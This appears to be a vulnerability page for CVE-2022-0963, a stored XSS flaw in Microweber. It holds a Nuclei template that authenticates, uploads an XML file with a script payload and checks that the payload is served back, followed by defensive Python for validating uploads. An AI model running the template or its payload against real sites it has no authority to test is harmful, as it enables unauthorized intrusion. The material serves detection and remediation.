| Title | Published | Views | Family |
|---|---|---|---|
| Unrestricted XML Files Leads to Stored XSS | 12 Mar 2022 05:44 | – | huntr |
| CVE-2022-0963 | 15 Mar 2022 16:15 | – | attackerkb |
| Microweber Cross-Site Scripting Vulnerability | 15 Mar 2022 00:00 | – | cnnvd |
| Microweber File Upload Vulnerability (CNVD-2022-20514) | 17 Mar 2022 00:00 | – | cnvd |
| CVE-2022-0963 | 15 Mar 2022 15:30 | – | cve |
| CVE-2022-0963 Unrestricted XML Files Leads to Stored XSS in microweber/microweber | 15 Mar 2022 15:30 | – | cvelist |
| EUVD-2022-1508 | 3 Oct 2025 20:07 | – | euvd |
| Unrestricted XML files leading to cross-site scripting in Microweber | 16 Mar 2022 00:00 | – | github |
| CVE-2022-0963 | 15 Mar 2022 16:15 | – | nvd |
| CVE-2022-0963 Unrestricted XML Files Leads to Stored XSS in microweber/microweber | 15 Mar 2022 15:30 | – | osv |
```yaml
id: CVE-2022-0963

info:
  name: Microweber <1.2.12 - Stored Cross-Site Scripting
  author: amit-jd
  severity: medium
  description: |
    Microweber prior to 1.2.12 contains a stored cross-site scripting vulnerability. It allows unrestricted upload of XML files.
  impact: |
    Authenticated attackers can upload malicious XML files containing XSS payloads that execute when users access the uploaded files, potentially stealing session cookies or performing unauthorized actions.
  remediation: |
    Upgrade Microweber CMS to version 1.2.12 or later to mitigate the vulnerability.
  reference:
    - https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c/
    - https://github.com/advisories/GHSA-q3x2-jvp3-wj78
    - https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0963
    - https://github.com/microweber/microweber/commit/975fc1d6d3fba598ee550849ceb81af23ce72e08
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2022-0963
    cwe-id: CWE-79
    epss-score: 0.01877
    epss-percentile: 0.76862
    cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: microweber
    product: microweber
    shodan-query:
      - http.favicon.hash:780351152
      - http.html:"microweber"
    fofa-query:
      - body="microweber"
      - icon_hash=780351152
  tags: cve,cve2022,xss,microweber,cms,authenticated,huntr,intrusive,vuln

http:
  - raw:
      - |
        POST /api/user_login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}

      - |
        POST /plupload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------59866212126262636974202255034
        Referer: {{BaseURL}}admin/view:modules/load_module:files

        -----------------------------59866212126262636974202255034
        Content-Disposition: form-data; name="name"

        {{randstr}}.xml
        -----------------------------59866212126262636974202255034
        Content-Disposition: form-data; name="chunk"

        0
        -----------------------------59866212126262636974202255034
        Content-Disposition: form-data; name="chunks"

        1
        -----------------------------59866212126262636974202255034
        Content-Disposition: form-data; name="file"; filename="blob"
        Content-Type: application/octet-stream

        <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>
        -----------------------------59866212126262636974202255034--

      - |
        GET /userfiles/media/default/{{to_lower("{{randstr}}")}}.xml HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_3,"alert(document.domain)")'
          - 'status_code_3==200'
          - 'contains(body_2,"bytes_uploaded")'
        condition: and
# digest: 490a004630440220657db9e38138093f61a5b14cd4d209a805cba5bddc15b7bf7650330aa1d42ad102203f191b6e9b71fb87a5033662d73c6936c79fa81472b85ee7bd1530352702067e:922c64590222798bb761d5b6d8e72950
```
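The template above exercises an upload endpoint that stores an XML file under a world-readable media path, from which a browser fetches it and renders the XHTML-namespaced script element as a live document. As an added defensive illustration (this is not Microweber's code and not part of the template or the Vulners page), the Python below shows the two checks a media-upload handler needs to close that class of bug, an extension allowlist that refuses document types browsers render as active content and a content sniff that catches markup hidden under a harmless extension, together with the response headers that make a stored file download rather than render. The extension lists, the MIME map, the function names and the sample files are assumptions constructed for the example.

```python
"""Added defensive example for the upload-to-stored-XSS pattern behind
CVE-2022-0963. Not Microweber's code; the extension lists, MIME map and the
sample files below are assumptions constructed for illustration."""
import re
from dataclasses import dataclass
from typing import Dict, Optional

# Media types a picture/document upload endpoint has a reason to accept (assumed allowlist).
CONTENT_TYPES: Dict[str, str] = {
    "jpg": "image/jpeg", "jpeg": "image/jpeg", "png": "image/png",
    "gif": "image/gif", "webp": "image/webp", "pdf": "application/pdf",
    "txt": "text/plain", "csv": "text/csv",
}

# Document types a browser will parse and may run script from when served inline.
# XML is here because an XML file carrying an XHTML-namespaced <script> element
# is rendered as a live document, which is exactly what the template above stores.
ACTIVE_CONTENT_EXTENSIONS = {"xml", "xhtml", "html", "htm", "svg", "xsl", "xslt", "js"}

# Leading markup that identifies a document regardless of the name it was given:
# optional UTF-8 BOM, optional whitespace, then an XML declaration, a doctype, or a
# root element such as <html>, <svg>, <script> or a namespaced <x:script>.
_MARKUP_HEAD = re.compile(
    rb"^(\xef\xbb\xbf)?\s*<(\?xml|!doctype|html|svg|script|[a-z]+:script)",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class UploadDecision:
    accepted: bool
    reason: str
    stored_name: Optional[str] = None
    content_type: Optional[str] = None


def validate_upload(filename: str, data: bytes) -> UploadDecision:
    """Decide whether an uploaded file may be stored in a world-readable media directory."""
    # Keep only the final path component so traversal sequences never reach the filesystem.
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if "." not in name:
        return UploadDecision(False, "no file extension")
    ext = name.rsplit(".", 1)[1].lower()
    if ext in ACTIVE_CONTENT_EXTENSIONS:
        return UploadDecision(False, f".{ext} is rendered as active content by browsers")
    if ext not in CONTENT_TYPES:
        return UploadDecision(False, f".{ext} is not on the upload allowlist")
    # Sniff the content as well: a markup document renamed to .txt is still
    # script-capable if any layer later guesses the MIME type from the bytes.
    if _MARKUP_HEAD.match(data[:512]):
        return UploadDecision(False, "content begins with XML/HTML markup")
    # Normalise the stored name so it carries no shell- or URL-significant characters.
    stored = re.sub(r"[^a-z0-9._-]", "_", name.lower())
    return UploadDecision(True, "accepted", stored, CONTENT_TYPES[ext])


def download_headers(decision: UploadDecision) -> Dict[str, str]:
    """Response headers for serving an accepted file so it downloads instead of rendering."""
    if not (decision.accepted and decision.stored_name and decision.content_type):
        raise ValueError("only accepted uploads are served")
    return {
        # The declared type is authoritative; nosniff stops the browser second-guessing it.
        "Content-Type": decision.content_type,
        "X-Content-Type-Options": "nosniff",
        # Force a download so even a mis-typed file is never executed as a page.
        "Content-Disposition": f'attachment; filename="{decision.stored_name}"',
        # No script, no frames and no origin for anything that does get rendered.
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


# Constructed sample uploads (not real files): the first two mirror the shape the
# template stores, the third is a benign PNG header.
SAMPLES = {
    "report.xml": b'<?xml version="1.0"?><root/>',
    "notes.txt": b'<x:script xmlns:x="http://www.w3.org/1999/xhtml">/* constructed */</x:script>',
    "Holiday Photo.PNG": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
}

if __name__ == "__main__":
    for fname, blob in SAMPLES.items():
        d = validate_upload(fname, blob)
        print(f"{fname!r}: {'ACCEPT' if d.accepted else 'REJECT'} ({d.reason})")
        if d.accepted:
            print("   serve with", download_headers(d))
```

The extension check alone would not have been enough in the situation the template describes, because an `.xml` name is only one spelling of the problem; the content sniff rejects the same XHTML script element when it arrives under a `.txt` name, and the `nosniff` plus `attachment` headers mean that a file which somehow passes both checks is still handed to the browser as an opaque download rather than a document.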